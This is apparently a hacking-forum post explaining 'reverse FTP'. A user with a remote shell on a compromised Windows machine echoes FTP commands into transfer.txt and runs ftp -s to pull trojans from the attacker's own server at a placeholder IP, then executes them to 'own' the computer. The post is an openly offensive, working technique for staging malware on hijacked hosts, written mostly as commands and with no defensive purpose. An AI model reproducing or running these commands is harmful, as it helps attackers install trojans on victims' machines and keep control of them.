who am i ? i am oxygen , your need for breathing !!! hahaha
how to upload files to remote system ?
perhaps you have got a remote shell prompt on your pc and you decided to upload files
and now this moment is very important to you , a question in mind : how to ???
well , reverse ftp'ing :
i explain it in few steps :
1 - configure a good ftp server on your pc and run it
2 - choice good username and password for your ftp server
3 - put all needed files to upload ( trojans ..etc ) on your ftp server local directory
4 - in hacked command shell enter the following commands :
echo off
echo open 192.168.xxx.xxx>transfer.txt ;put your IP
echo your-user-name>>transfer.txt ;for your ftp server
echo your-password>>transfer.txt ;for your ftp server
echo get file1.exe>>transfer.txt ; any file or trojan to upload
echo get file2.exe>>transfer.txt ; any file or trojan to upload
.... ; may be continued as needed
.... ; may be continued as needed
echo quit >>transfer.txt ; end of uploading transfer
ftp -s:transfer.txt ; ftp'ing script
* notice that right side quotations are only for explaning purpose *
if every thing is ok , you will see the transfering proccess for some minutes
when ftping finished you can run your files on remote computer ! you owned new computer !!!
i always use my favorite ftp server : *** buffy ***
link for download : buffy.zip
buffy is fully configureable and easy to use . thanks to programmer: francois piette (ICS)
==================================================
oxygen007m - ICQ#171449237
==================================================
TOPIC MOVED: This doesnt have a file in it for download. -OneNight-




